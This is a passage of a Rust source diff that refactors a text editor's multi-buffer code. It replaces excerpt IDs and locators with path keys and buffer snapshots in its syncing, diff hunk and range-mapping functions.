self.expand_or_collapse_diff_hunks_inner(ranges, expand, cx); if !edits.is_empty() { self.subscriptions.publish(edits); @@ -2883,185 +2449,10 @@ impl MultiBuffer { cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } - pub fn resize_excerpt( - &mut self, - id: ExcerptId, - range: Range, - cx: &mut Context, - ) { - self.sync_mut(cx); - - let mut snapshot = self.snapshot.get_mut(); - let locator = snapshot.excerpt_locator_for_id(id); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::>::new(); - - let prefix = cursor.slice(&Some(locator), Bias::Left); - new_excerpts.append(prefix, ()); - - let mut excerpt = cursor.item().unwrap().clone(); - let old_text_len = excerpt.text_summary.len; - - excerpt.range.context.start = range.start; - excerpt.range.context.end = range.end; - excerpt.max_buffer_row = range.end.to_point(&excerpt.buffer).row; - - excerpt.text_summary = excerpt - .buffer - 
.text_summary_for_range(excerpt.range.context.clone()); - - let new_start_offset = ExcerptDimension(new_excerpts.summary().text.len); - let old_start_offset = cursor.start().1; - let new_text_len = excerpt.text_summary.len; - let edit = Edit { - old: old_start_offset..old_start_offset + old_text_len, - new: new_start_offset..new_start_offset + new_text_len, - }; - - if let Some(last_edit) = edits.last_mut() { - if last_edit.old.end == edit.old.start { - last_edit.old.end = edit.old.end; - last_edit.new.end = edit.new.end; - } else { - edits.push(edit); - } - } else { - edits.push(edit); - } - - new_excerpts.push(excerpt, ()); - - cursor.next(); - - new_excerpts.append(cursor.suffix(), ()); - - drop(cursor); - snapshot.excerpts = new_excerpts; - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsExpanded { ids: vec![id] }); - cx.notify(); - } - - pub fn expand_excerpts( - &mut self, - ids: impl IntoIterator, - line_count: u32, - direction: ExpandExcerptDirection, - cx: &mut Context, - ) { - if line_count == 0 { - return; - } - self.sync_mut(cx); - if !self.excerpts_by_path.is_empty() { - self.expand_excerpts_with_paths(ids, line_count, direction, cx); - return; - } - let mut snapshot = self.snapshot.get_mut(); - - let ids = ids.into_iter().collect::>(); - let locators = snapshot.excerpt_locators_for_ids(ids.iter().copied()); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::>::new(); - - for locator in &locators { - let prefix = cursor.slice(&Some(locator), Bias::Left); - new_excerpts.append(prefix, ()); - - let mut excerpt = cursor.item().unwrap().clone(); - let old_text_len = excerpt.text_summary.len; - - let up_line_count = if direction.should_expand_up() { - line_count - } else { - 0 - 
}; - - let start_row = excerpt - .range - .context - .start - .to_point(&excerpt.buffer) - .row - .saturating_sub(up_line_count); - let start_point = Point::new(start_row, 0); - excerpt.range.context.start = excerpt.buffer.anchor_before(start_point); - - let down_line_count = if direction.should_expand_down() { - line_count - } else { - 0 - }; - - let mut end_point = excerpt.buffer.clip_point( - excerpt.range.context.end.to_point(&excerpt.buffer) - + Point::new(down_line_count, 0), - Bias::Left, - ); - end_point.column = excerpt.buffer.line_len(end_point.row); - excerpt.range.context.end = excerpt.buffer.anchor_after(end_point); - excerpt.max_buffer_row = end_point.row; - - excerpt.text_summary = excerpt - .buffer - .text_summary_for_range(excerpt.range.context.clone()); - - let new_start_offset = ExcerptDimension(new_excerpts.summary().text.len); - let old_start_offset = cursor.start().1; - let new_text_len = excerpt.text_summary.len; - let edit = Edit { - old: old_start_offset..old_start_offset + old_text_len, - new: new_start_offset..new_start_offset + new_text_len, - }; - - if let Some(last_edit) = edits.last_mut() { - if last_edit.old.end == edit.old.start { - last_edit.old.end = edit.old.end; - last_edit.new.end = edit.new.end; - } else { - edits.push(edit); - } - } else { - edits.push(edit); - } - - new_excerpts.push(excerpt, ()); - - cursor.next(); - } - - new_excerpts.append(cursor.suffix(), ()); - - drop(cursor); - snapshot.excerpts = new_excerpts; - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsExpanded { ids }); - cx.notify(); - } - #[ztracing::instrument(skip_all)] fn sync(&self, cx: &App) { let changed = self.buffer_changed_since_sync.replace(false); @@ -3079,17 +2470,19 @@ impl MultiBuffer { } } - fn sync_mut(&mut self, cx: &App) { + fn sync_mut(&mut self, cx: 
&App) -> &mut MultiBufferSnapshot { + let snapshot = self.snapshot.get_mut(); let changed = self.buffer_changed_since_sync.replace(false); if !changed { - return; + return snapshot; } - let edits = - Self::sync_from_buffer_changes(self.snapshot.get_mut(), &self.buffers, &self.diffs, cx); + let edits = Self::sync_from_buffer_changes(snapshot, &self.buffers, &self.diffs, cx); if !edits.is_empty() { self.subscriptions.publish(edits); } + + snapshot } fn sync_from_buffer_changes( @@ -3100,8 +2493,10 @@ impl MultiBuffer { ) -> Vec> { let MultiBufferSnapshot { excerpts, - buffer_locators: _, diffs: buffer_diff, + buffers: buffer_snapshots, + path_keys_by_index: _, + indices_by_path_key: _, diff_transforms: _, non_text_state_update_count, edit_count, @@ -3110,8 +2505,6 @@ impl MultiBuffer { has_conflict, has_inverted_diff: _, singleton: _, - excerpt_ids: _, - replaced_excerpts: _, trailing_excerpt_update_count: _, all_diff_hunks_expanded: _, show_deleted_hunks: _, @@ -3125,11 +2518,7 @@ impl MultiBuffer { if !diffs.is_empty() { let mut diffs_to_add = Vec::new(); for (id, diff) in diffs { - // For inverted diffs, we excerpt the diff base texts in the multibuffer - // and use the diff hunk base text ranges to compute diff transforms. 
- // Those base text ranges are usize, so make sure if the base text changed - // we also update the diff snapshot so that we don't use stale offsets - if buffer_diff.get(id).is_none_or(|existing_diff| { + if find_diff_state(buffer_diff, *id).is_none_or(|existing_diff| { if existing_diff.main_buffer.is_none() { return false; } @@ -3140,38 +2529,40 @@ impl MultiBuffer { .changed_since(existing_diff.base_text().version()) }) { if diffs_to_add.capacity() == 0 { - // we'd rather overallocate than reallocate as buffer diffs are quite big - // meaning re-allocations will be fairly expensive diffs_to_add.reserve(diffs.len()); } - diffs_to_add.push((*id, diff.snapshot(cx))); + diffs_to_add.push(sum_tree::Edit::Insert(diff.snapshot(*id, cx))); } } - buffer_diff.extend(diffs_to_add); + buffer_diff.edit(diffs_to_add, ()); } - let mut excerpts_to_edit = Vec::new(); + let mut paths_to_edit = Vec::new(); let mut non_text_state_updated = false; let mut edited = false; for buffer_state in buffers.values() { let buffer = buffer_state.buffer.read(cx); - let version = buffer.version(); + let last_snapshot = buffer_snapshots + .get(&buffer.remote_id()) + .expect("each buffer should have a snapshot"); + let current_version = buffer.version(); let non_text_state_update_count = buffer.non_text_state_update_count(); - let buffer_edited = version.changed_since(&buffer_state.last_version.borrow()); - let buffer_non_text_state_updated = - non_text_state_update_count > buffer_state.last_non_text_state_update_count.get(); + let buffer_edited = + current_version.changed_since(last_snapshot.buffer_snapshot.version()); + let buffer_non_text_state_updated = non_text_state_update_count + > last_snapshot.buffer_snapshot.non_text_state_update_count(); if buffer_edited || buffer_non_text_state_updated { - *buffer_state.last_version.borrow_mut() = version; - buffer_state - .last_non_text_state_update_count - .set(non_text_state_update_count); - excerpts_to_edit.extend( - buffer_state - .excerpts - 
.iter() - .map(|locator| (locator, buffer_state.buffer.clone(), buffer_edited)), - ); + paths_to_edit.push(( + last_snapshot.path_key.clone(), + last_snapshot.path_key_index, + buffer_state.buffer.clone(), + if buffer_edited { + Some(last_snapshot.buffer_snapshot.version().clone()) + } else { + None + }, + )); } edited |= buffer_edited; @@ -3189,55 +2580,64 @@ impl MultiBuffer { *non_text_state_update_count += 1; } - excerpts_to_edit.sort_unstable_by_key(|&(locator, _, _)| locator); + paths_to_edit.sort_unstable_by_key(|(path, _, _, _)| path.clone()); let mut edits = Vec::new(); let mut new_excerpts = SumTree::default(); - let mut cursor = excerpts.cursor::, ExcerptOffset>>(()); + let mut cursor = excerpts.cursor::(()); - for (locator, buffer, buffer_edited) in excerpts_to_edit { - new_excerpts.append(cursor.slice(&Some(locator), Bias::Left), ()); - let old_excerpt = cursor.item().unwrap(); + for (path, path_key_index, buffer, prev_version) in paths_to_edit { + new_excerpts.append(cursor.slice(&path, Bias::Left), ()); let buffer = buffer.read(cx); let buffer_id = buffer.remote_id(); - let mut new_excerpt; - if buffer_edited { - edits.extend( - buffer - .edits_since_in_range::( - old_excerpt.buffer.version(), - old_excerpt.range.context.clone(), - ) - .map(|edit| { - let excerpt_old_start = cursor.start().1; - let excerpt_new_start = - ExcerptDimension(new_excerpts.summary().text.len); - let old_start = excerpt_old_start + edit.old.start; - let old_end = excerpt_old_start + edit.old.end; - let new_start = excerpt_new_start + edit.new.start; - let new_end = excerpt_new_start + edit.new.end; - Edit { - old: old_start..old_end, - new: new_start..new_end, - } - }), - ); - new_excerpt = Excerpt::new( - old_excerpt.id, - locator.clone(), - buffer_id, - Arc::new(buffer.snapshot()), - old_excerpt.range.clone(), - old_excerpt.has_trailing_newline, - ); - } else { - new_excerpt = old_excerpt.clone(); - new_excerpt.buffer = Arc::new(buffer.snapshot()); - } + 
buffer_snapshots.insert( + buffer_id, + BufferStateSnapshot { + path_key: path.clone(), + path_key_index, + buffer_snapshot: buffer.snapshot(), + }, + ); - new_excerpts.push(new_excerpt, ()); - cursor.next(); + if let Some(prev_version) = &prev_version { + while let Some(old_excerpt) = cursor.item() + && &old_excerpt.path_key == &path + { + edits.extend( + buffer + .edits_since_in_range::( + prev_version, + old_excerpt.range.context.clone(), + ) + .map(|edit| { + let excerpt_old_start = cursor.start().len(); + let excerpt_new_start = + ExcerptDimension(new_excerpts.summary().text.len); + let old_start = excerpt_old_start + edit.old.start; + let old_end = excerpt_old_start + edit.old.end; + let new_start = excerpt_new_start + edit.new.start; + let new_end = excerpt_new_start + edit.new.end; + Edit { + old: old_start..old_end, + new: new_start..new_end, + } + }), + ); + + let excerpt = Excerpt::new( + old_excerpt.path_key.clone(), + old_excerpt.path_key_index, + &buffer.snapshot(), + old_excerpt.range.clone(), + old_excerpt.has_trailing_newline, + ); + new_excerpts.push(excerpt, ()); + cursor.next(); + } + } else { + new_excerpts.append(cursor.slice(&path, Bias::Right), ()); + }; } new_excerpts.append(cursor.suffix(), ()); @@ -3334,12 +2734,13 @@ impl MultiBuffer { inserted_hunk_info: Some(hunk), .. }) => excerpts.item().is_some_and(|excerpt| { - if let Some(diff) = snapshot.diffs.get(&excerpt.buffer_id) + if let Some(diff) = find_diff_state(&snapshot.diffs, excerpt.buffer_id) && diff.main_buffer.is_some() { return true; } - hunk.hunk_start_anchor.is_valid(&excerpt.buffer) + hunk.hunk_start_anchor + .is_valid(&excerpt.buffer_snapshot(&snapshot)) }), _ => true, }; @@ -3435,11 +2836,11 @@ impl MultiBuffer { while let Some(excerpt) = excerpts.item() { // Recompute the expanded hunks in the portion of the excerpt that // intersects the edit. 
- if let Some(diff) = snapshot.diffs.get(&excerpt.buffer_id) { - let buffer = &excerpt.buffer; + if let Some(diff) = find_diff_state(&snapshot.diffs, excerpt.buffer_id) { + let buffer_snapshot = &excerpt.buffer_snapshot(&snapshot); let excerpt_start = *excerpts.start(); let excerpt_end = excerpt_start + excerpt.text_summary.len; - let excerpt_buffer_start = excerpt.range.context.start.to_offset(buffer); + let excerpt_buffer_start = excerpt.range.context.start.to_offset(buffer_snapshot); let excerpt_buffer_end = excerpt_buffer_start + excerpt.text_summary.len; let edit_buffer_start = excerpt_buffer_start + edit.new.start.saturating_sub(excerpt_start); @@ -3458,7 +2859,6 @@ impl MultiBuffer { log::trace!("skipping hunk that starts before excerpt"); continue; } - hunk_buffer_range.end.to_point(&excerpt.buffer); let hunk_excerpt_start = excerpt_start + hunk_buffer_range.start.saturating_sub(excerpt_buffer_start); let hunk_excerpt_end = excerpt_end @@ -3471,9 +2871,10 @@ impl MultiBuffer { ); if !hunk_buffer_range.is_empty() { let hunk_info = DiffTransformHunkInfo { - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), hunk_start_anchor: hunk.buffer_range.start, hunk_secondary_status: hunk.secondary_status, + excerpt_end: excerpt.end_anchor(), is_logically_deleted: true, }; *end_of_current_insert = @@ -3481,23 +2882,24 @@ impl MultiBuffer { } } } else { - let edit_anchor_range = buffer.anchor_before(edit_buffer_start) - ..buffer.anchor_after(edit_buffer_end); - for hunk in diff.hunks_intersecting_range(edit_anchor_range, buffer) { + let edit_anchor_range = buffer_snapshot.anchor_before(edit_buffer_start) + ..buffer_snapshot.anchor_after(edit_buffer_end); + for hunk in diff.hunks_intersecting_range(edit_anchor_range, buffer_snapshot) { if hunk.is_created_file() && !all_diff_hunks_expanded { continue; } - let hunk_buffer_range = hunk.buffer_range.to_offset(buffer); + let hunk_buffer_range = hunk.buffer_range.to_offset(buffer_snapshot); if 
hunk_buffer_range.start < excerpt_buffer_start { log::trace!("skipping hunk that starts before excerpt"); continue; } let hunk_info = DiffTransformHunkInfo { - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), hunk_start_anchor: hunk.buffer_range.start, hunk_secondary_status: hunk.secondary_status, + excerpt_end: excerpt.end_anchor(), is_logically_deleted: false, }; @@ -3522,7 +2924,7 @@ impl MultiBuffer { } DiffChangeKind::ExpandOrCollapseHunks { expand } => { let intersects = hunk_buffer_range.is_empty() - || hunk_buffer_range.end > edit_buffer_start; + || (hunk_buffer_range.end > edit_buffer_start); if *expand { intersects || was_previously_expanded || all_diff_hunks_expanded } else { @@ -3536,9 +2938,8 @@ impl MultiBuffer { if should_expand_hunk { did_expand_hunks = true; log::trace!( - "expanding hunk {:?}, excerpt:{:?}", + "expanding hunk {:?}", hunk_excerpt_start..hunk_excerpt_end, - excerpt.id ); if !hunk.diff_base_byte_range.is_empty() @@ -3562,7 +2963,7 @@ impl MultiBuffer { DiffTransform::DeletedHunk { base_text_byte_range: hunk.diff_base_byte_range.clone(), summary: base_text_summary, - buffer_id: excerpt.buffer_id, + buffer_id: buffer_snapshot.remote_id(), hunk_info, has_trailing_newline, }, @@ -3689,17 +3090,20 @@ impl MultiBuffer { pub fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { let snapshot = self.snapshot(cx); - let excerpt_id = range.end.excerpt_id; + let excerpt_end = snapshot + .excerpt_containing(range.end..range.end) + .and_then(|(_, excerpt_range)| snapshot.anchor_in_excerpt(excerpt_range.context.end)); let point_range = range.to_point(&snapshot); let expand = !self.single_hunk_is_expanded(range, cx); let edits = - self.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); + self.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_end)], expand, cx); if !edits.is_empty() { self.subscriptions.publish(edits); } cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { 
edited_buffer: None, + is_local: true, }); } } @@ -3818,38 +3222,15 @@ impl MultiBuffer { use std::env; use util::RandomCharIter; - let max_excerpts = env::var("MAX_EXCERPTS") + let max_buffers = env::var("MAX_BUFFERS") .map(|i| i.parse().expect("invalid `MAX_EXCERPTS` variable")) .unwrap_or(5); let mut buffers = Vec::new(); for _ in 0..mutation_count { - if rng.random_bool(0.05) { - log::info!("Clearing multi-buffer"); - self.clear(cx); - continue; - } else if rng.random_bool(0.1) && !self.excerpt_ids().is_empty() { - let ids = self.excerpt_ids(); - let mut excerpts = HashSet::default(); - for _ in 0..rng.random_range(0..ids.len()) { - excerpts.extend(ids.choose(rng).copied()); - } - - let line_count = rng.random_range(0..5); - - log::info!("Expanding excerpts {excerpts:?} by {line_count} lines"); - - self.expand_excerpts( - excerpts.iter().cloned(), - line_count, - ExpandExcerptDirection::UpAndDown, - cx, - ); - continue; - } - - let excerpt_ids = self.excerpt_ids(); - if excerpt_ids.is_empty() || (rng.random() && excerpt_ids.len() < max_excerpts) { + let snapshot = self.snapshot(cx); + let buffer_ids = snapshot.all_buffer_ids().collect::>(); + if buffer_ids.is_empty() || (rng.random() && buffer_ids.len() < max_buffers) { let buffer_handle = if rng.random() || self.buffers.is_empty() { let text = RandomCharIter::new(&mut *rng).take(10).collect::(); buffers.push(cx.new(|cx| Buffer::local(text, cx))); @@ -3866,12 +3247,21 @@ impl MultiBuffer { let buffer = buffer_handle.read(cx); let buffer_text = buffer.text(); + let buffer_snapshot = buffer.snapshot(); + let mut next_min_start_ix = 0; let ranges = (0..rng.random_range(0..5)) - .map(|_| { - let end_ix = - buffer.clip_offset(rng.random_range(0..=buffer.len()), Bias::Right); - let start_ix = buffer.clip_offset(rng.random_range(0..=end_ix), Bias::Left); - ExcerptRange::new(start_ix..end_ix) + .filter_map(|_| { + if next_min_start_ix >= buffer.len() { + return None; + } + let end_ix = buffer.clip_offset( + 
rng.random_range(next_min_start_ix..=buffer.len()), + Bias::Right, + ); + let start_ix = buffer + .clip_offset(rng.random_range(next_min_start_ix..=end_ix), Bias::Left); + next_min_start_ix = buffer.text().ceil_char_boundary(end_ix + 1); + Some(ExcerptRange::new(start_ix..end_ix)) }) .collect::>(); log::info!( @@ -3884,20 +3274,26 @@ impl MultiBuffer { .collect::>() ); - let excerpt_id = - self.insert_excerpts_after(ExcerptId::max(), buffer_handle, ranges, cx); - log::info!("Inserted with ids: {:?}", excerpt_id); + let path_key = PathKey::for_buffer(&buffer_handle, cx); + self.set_merged_excerpt_ranges_for_path( + path_key.clone(), + buffer_handle, + &buffer_snapshot, + ranges, + cx, + ); + log::info!("Inserted with path_key: {:?}", path_key); } else { - let remove_count = rng.random_range(1..=excerpt_ids.len()); - let mut excerpts_to_remove = excerpt_ids - .choose_multiple(rng, remove_count) - .cloned() - .collect::>(); - let snapshot = self.snapshot.borrow(); - excerpts_to_remove.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - drop(snapshot); - log::info!("Removing excerpts {:?}", excerpts_to_remove); - self.remove_excerpts(excerpts_to_remove, cx); + let path_key = self + .snapshot + .borrow() + .buffers + .get(&buffer_ids.choose(rng).unwrap()) + .unwrap() + .path_key + .clone(); + log::info!("Removing excerpts {:?}", path_key); + self.remove_excerpts(path_key, cx); } } } @@ -4005,7 +3401,7 @@ impl MultiBufferSnapshot { } pub fn diff_hunks(&self) -> impl Iterator + '_ { - self.diff_hunks_in_range(Anchor::min()..Anchor::max()) + self.diff_hunks_in_range(Anchor::Min..Anchor::Max) } pub fn diff_hunks_in_range( @@ -4014,7 +3410,7 @@ impl MultiBufferSnapshot { ) -> impl Iterator + '_ { let query_range = range.start.to_point(self)..range.end.to_point(self); self.lift_buffer_metadata(query_range.clone(), move |buffer, buffer_range| { - let diff = self.diffs.get(&buffer.remote_id())?; + let diff = self.diff_state(buffer.remote_id())?; let iter = if let Some(main_buffer) 
= &diff.main_buffer { let buffer_start = buffer.point_to_offset(buffer_range.start); let buffer_end = buffer.point_to_offset(buffer_range.end); @@ -4043,6 +3439,7 @@ impl MultiBufferSnapshot { })) }) .filter_map(move |(range, (hunk, is_inverted), excerpt)| { + let buffer_snapshot = excerpt.buffer_snapshot(self); if range.start != range.end && range.end == query_range.start && !hunk.range.is_empty() { return None; @@ -4061,12 +3458,12 @@ impl MultiBufferSnapshot { if self.show_deleted_hunks || is_inverted { let hunk_start_offset = if is_inverted { Anchor::in_buffer( - excerpt.id, - excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start), + excerpt.path_key_index, + buffer_snapshot.anchor_after(hunk.diff_base_byte_range.start), ) .to_offset(self) } else { - Anchor::in_buffer(excerpt.id, hunk.buffer_range.start) + Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) .to_offset(self) }; @@ -4077,7 +3474,8 @@ impl MultiBufferSnapshot { if !is_inverted { word_diffs.extend(hunk.buffer_word_diffs.into_iter().map(|diff| { - Anchor::range_in_buffer(excerpt.id, diff).to_offset(self) + Anchor::range_in_buffer(excerpt.path_key_index, diff) + .to_offset(self) })); } word_diffs @@ -4085,8 +3483,8 @@ impl MultiBufferSnapshot { .unwrap_or_default(); let buffer_range = if is_inverted { - excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start) - ..excerpt.buffer.anchor_before(hunk.diff_base_byte_range.end) + buffer_snapshot.anchor_after(hunk.diff_base_byte_range.start) + ..buffer_snapshot.anchor_before(hunk.diff_base_byte_range.end) } else { hunk.buffer_range.clone() }; @@ -4097,10 +3495,11 @@ impl MultiBufferSnapshot { } else { DiffHunkStatusKind::Modified }; + let multi_buffer_range = + Anchor::range_in_buffer(excerpt.path_key_index, buffer_range.clone()); Some(MultiBufferDiffHunk { row_range: MultiBufferRow(range.start.row)..MultiBufferRow(end_row), - buffer_id: excerpt.buffer_id, - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), 
buffer_range, word_diffs, diff_base_byte_range: BufferOffset(hunk.diff_base_byte_range.start) @@ -4109,6 +3508,8 @@ impl MultiBufferSnapshot { kind: status_kind, secondary: hunk.secondary_status, }, + excerpt_range: excerpt.range.clone(), + multi_buffer_range, }) }) } @@ -4133,19 +3534,12 @@ impl MultiBufferSnapshot { }) } - pub fn excerpt_ids_for_range( + pub fn buffer_ids_for_range( &self, range: Range, - ) -> impl Iterator + '_ { - self.excerpts_for_range(range).map(|excerpt| excerpt.id) - } - - pub fn buffer_ids_for_range( - &self, - range: Range, - ) -> impl Iterator + '_ { - self.excerpts_for_range(range) - .map(|excerpt| excerpt.buffer_id) + ) -> impl Iterator + '_ { + self.excerpts_for_range(range) + .map(|excerpt| excerpt.buffer_snapshot(self).remote_id()) } /// Resolves the given [`text::Anchor`]s to [`crate::Anchor`]s if the anchor is within a visible excerpt. @@ -4158,69 +3552,66 @@ impl MultiBufferSnapshot { let anchors = anchors.into_iter(); let mut result = Vec::with_capacity(anchors.size_hint().0); let mut anchors = anchors.peekable(); - let mut cursor = self.excerpts.cursor::>(()); + let mut cursor = self.excerpts.cursor::(()); 'anchors: while let Some(anchor) = anchors.peek() { - let Some(buffer_id) = anchor.buffer_id else { - anchors.next(); - result.push(None); - continue 'anchors; - }; - let mut same_buffer_anchors = - anchors.peeking_take_while(|a| a.buffer_id.is_some_and(|b| buffer_id == b)); + let buffer_id = anchor.buffer_id; + let mut same_buffer_anchors = anchors.peeking_take_while(|a| a.buffer_id == buffer_id); - if let Some(locators) = self.buffer_locators.get(&buffer_id) { + if let Some(buffer) = self.buffers.get(&buffer_id) { + let path = &buffer.path_key; let Some(mut next) = same_buffer_anchors.next() else { continue 'anchors; }; - 'excerpts: for locator in locators.iter() { - if cursor.seek_forward(&Some(locator), Bias::Left) - && let Some(excerpt) = cursor.item() - { - loop { - // anchor is before the first excerpt - if excerpt - 
.range - .context - .start - .cmp(&next, &excerpt.buffer) - .is_gt() - { - // so we skip it and try the next anchor - result.push(None); - match same_buffer_anchors.next() { - Some(anchor) => next = anchor, - None => continue 'anchors, - } - // anchor is within the excerpt - } else if excerpt - .range - .context - .end - .cmp(&next, &excerpt.buffer) - .is_ge() - { - // record it and all following anchors that are within - result.push(Some(Anchor::in_buffer(excerpt.id, next))); - result.extend( - same_buffer_anchors - .peeking_take_while(|a| { - excerpt - .range - .context - .end - .cmp(a, &excerpt.buffer) - .is_ge() - }) - .map(|a| Some(Anchor::in_buffer(excerpt.id, a))), - ); - match same_buffer_anchors.next() { - Some(anchor) => next = anchor, - None => continue 'anchors, - } - // anchor is after the excerpt, try the next one - } else { - continue 'excerpts; + cursor.seek_forward(path, Bias::Left); + 'excerpts: loop { + let Some(excerpt) = cursor.item() else { + break; + }; + if &excerpt.path_key != path { + break; + } + let buffer_snapshot = excerpt.buffer_snapshot(self); + + loop { + // anchor is before the first excerpt + if excerpt + .range + .context + .start + .cmp(&next, &buffer_snapshot) + .is_gt() + { + // so we skip it and try the next anchor + result.push(None); + match same_buffer_anchors.next() { + Some(anchor) => next = anchor, + None => continue 'anchors, + } + // anchor is within the excerpt + } else if excerpt + .range + .context + .end + .cmp(&next, &buffer_snapshot) + .is_ge() + { + // record it and all following anchors that are within + result.push(Some(Anchor::in_buffer(excerpt.path_key_index, next))); + result.extend( + same_buffer_anchors + .peeking_take_while(|a| { + excerpt.range.context.end.cmp(a, &buffer_snapshot).is_ge() + }) + .map(|a| Some(Anchor::in_buffer(excerpt.path_key_index, a))), + ); + match same_buffer_anchors.next() { + Some(anchor) => next = anchor, + None => continue 'anchors, } + // anchor is after the excerpt, try the 
next one + } else { + cursor.next(); + continue 'excerpts; } } } @@ -4233,79 +3624,31 @@ impl MultiBufferSnapshot { result } - pub fn ranges_to_buffer_ranges( - &self, - ranges: impl Iterator>, - ) -> impl Iterator, ExcerptId)> { - ranges.flat_map(|range| { - self.range_to_buffer_ranges((Bound::Included(range.start), Bound::Included(range.end))) - .into_iter() - }) - } - - pub fn range_to_buffer_ranges( - &self, - range: R, - ) -> Vec<(&BufferSnapshot, Range, ExcerptId)> - where - R: RangeBounds, - T: ToOffset, - { - self.range_to_buffer_ranges_with_context(range) - .into_iter() - .map(|(buffer, range, id, _context)| (buffer, range, id)) - .collect() - } - - pub fn range_to_buffer_ranges_with_context( + pub fn range_to_buffer_ranges( &self, - range: R, + range: Range, ) -> Vec<( - &BufferSnapshot, + BufferSnapshot, Range, - ExcerptId, - Range, - )> - where - R: RangeBounds, - T: ToOffset, - { - let start = match range.start_bound() { - Bound::Included(start) => start.to_offset(self), - Bound::Excluded(_) => panic!("excluded start bound not supported"), - Bound::Unbounded => MultiBufferOffset::ZERO, - }; - let end_bound = match range.end_bound() { - Bound::Included(end) => Bound::Included(end.to_offset(self)), - Bound::Excluded(end) => Bound::Excluded(end.to_offset(self)), - Bound::Unbounded => Bound::Unbounded, - }; - let bounds = (Bound::Included(start), end_bound); - + ExcerptRange, + )> { let mut cursor = self.cursor::(); + let start = range.start.to_offset(self); + let end = range.end.to_offset(self); cursor.seek(&start); let mut result: Vec<( - &BufferSnapshot, + BufferSnapshot, Range, - ExcerptId, - Range, + ExcerptRange, )> = Vec::new(); while let Some(region) = cursor.region() { - let dominated_by_end_bound = match end_bound { - Bound::Included(end) => region.range.start > end, - Bound::Excluded(end) => region.range.start >= end, - Bound::Unbounded => false, - }; - if dominated_by_end_bound { + if region.range.start >= end { break; } if 
region.is_main_buffer { let start_overshoot = start.saturating_sub(region.range.start); - let end_offset = match end_bound { - Bound::Included(end) | Bound::Excluded(end) => end, - Bound::Unbounded => region.range.end, - }; + let end_offset = end; let end_overshoot = end_offset.saturating_sub(region.range.start); let start = region .buffer_range @@ -4315,34 +3658,46 @@ impl MultiBufferSnapshot { .buffer_range .end .min(region.buffer_range.start + end_overshoot); - let context = region.excerpt.range.context.clone(); - if let Some(prev) = result.last_mut().filter(|(_, prev_range, excerpt_id, _)| { - *excerpt_id == region.excerpt.id && prev_range.end == start - }) { + let excerpt_range = region.excerpt.range.clone(); + if let Some(prev) = + result + .last_mut() + .filter(|(prev_buffer, prev_range, prev_excerpt)| { + prev_buffer.remote_id() == region.buffer.remote_id() + && prev_range.end == start + && prev_excerpt.context.start == excerpt_range.context.start + }) + { prev.1.end = end; } else { - result.push((region.buffer, start..end, region.excerpt.id, context)); + result.push((region.buffer.clone(), start..end, excerpt_range)); } } cursor.next(); } - if let Some(excerpt) = cursor.excerpt() { - let dominated_by_prev_excerpt = - result.last().is_some_and(|(_, _, id, _)| *id == excerpt.id); - if !dominated_by_prev_excerpt && excerpt.text_summary.len == 0 { - let excerpt_position = self.len(); - if bounds.contains(&excerpt_position) { - let buffer_offset = - BufferOffset(excerpt.range.context.start.to_offset(&excerpt.buffer)); - let context = excerpt.range.context.clone(); - result.push(( - &excerpt.buffer, - buffer_offset..buffer_offset, - excerpt.id, - context, - )); - } + if let Some(excerpt) = cursor.excerpt() + && excerpt.text_summary.len == 0 + && end == self.len() + { + let buffer_snapshot = excerpt.buffer_snapshot(self); + + let buffer_offset = + BufferOffset(excerpt.range.context.start.to_offset(buffer_snapshot)); + let excerpt_range = excerpt.range.clone(); + 
if result + .last_mut() + .is_none_or(|(prev_buffer, prev_range, prev_excerpt)| { + prev_buffer.remote_id() != buffer_snapshot.remote_id() + || prev_range.end != buffer_offset + || prev_excerpt.context.start != excerpt_range.context.start + }) + { + result.push(( + buffer_snapshot.clone(), + buffer_offset..buffer_offset, + excerpt_range, + )); } } @@ -4352,14 +3707,7 @@ impl MultiBufferSnapshot { pub fn range_to_buffer_ranges_with_deleted_hunks( &self, range: Range, - ) -> impl Iterator< - Item = ( - &BufferSnapshot, - Range, - ExcerptId, - Option, - ), - > + '_ { + ) -> impl Iterator, Option)> + '_ { let start = range.start.to_offset(self); let end = range.end.to_offset(self); @@ -4382,18 +3730,12 @@ impl MultiBufferSnapshot { .end .min(region.buffer_range.start + end_overshoot); - let region_excerpt_id = region.excerpt.id; let deleted_hunk_anchor = if region.is_main_buffer { None } else { Some(self.anchor_before(region.range.start)) }; - let result = ( - region.buffer, - start..end, - region_excerpt_id, - deleted_hunk_anchor, - ); + let result = (region.buffer, start..end, deleted_hunk_anchor); cursor.next(); Some(result) }) @@ -4426,7 +3768,7 @@ impl MultiBufferSnapshot { + AddAssign + Ord, { - let mut current_excerpt_metadata: Option<(ExcerptId, I)> = None; + let mut current_excerpt_metadata: Option<(ExcerptRange, I)> = None; let mut cursor = self.cursor::(); // Find the excerpt and buffer offset where the given range ends. @@ -4441,7 +3783,7 @@ impl MultiBufferSnapshot { ::default() }; buffer_end = buffer_end + overshoot; - range_end = Some((region.excerpt.id, buffer_end)); + range_end = Some((region.excerpt.range.clone(), buffer_end)); break; } cursor.next(); @@ -4466,11 +3808,12 @@ impl MultiBufferSnapshot { iter::from_fn(move || { 